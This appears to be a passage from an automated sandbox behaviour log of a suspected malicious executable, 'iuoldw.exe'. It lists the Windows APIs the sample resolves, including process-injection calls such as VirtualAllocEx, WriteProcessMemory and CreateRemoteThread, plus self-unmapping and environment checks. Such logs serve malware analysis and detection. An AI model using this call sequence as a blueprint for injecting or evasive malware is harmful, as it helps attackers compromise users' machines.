| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x76b859b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x76bde405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x76bdef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x76bdf00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x76bdef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x76bdf15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x76bddbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x76bdecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x76bdea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x76bdd332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x76bdee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x76bdca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x76bdcc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x76bdcde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x76bdc802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x76bdec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x76bdd155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x76b7b0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x76b95f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x76b84fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x76b80d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x76b959ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x76b6f8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75499d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75460782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x74940000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74987685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x757a7d2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x757b3150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x757ce7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x757b5281 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x757b451a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x757b4413 |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 2302108 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Langskallet7, wndproc_parameter = 0 |
|
1 | |
| Module | Load | module_name = KERNEL32 , base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x75a1cfcc |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a80efd |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x75e98af2 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x7728fb18 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x757b0a19 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x7728ff2c |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| Module | Load | module_name = ntdll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77290028 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x75a053c6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x75a0196e |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x75a01826 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a845bf |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a8437f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x75a1d802 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x74920000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74929263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x75e97078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x757ad1cf |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x757b3961 |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
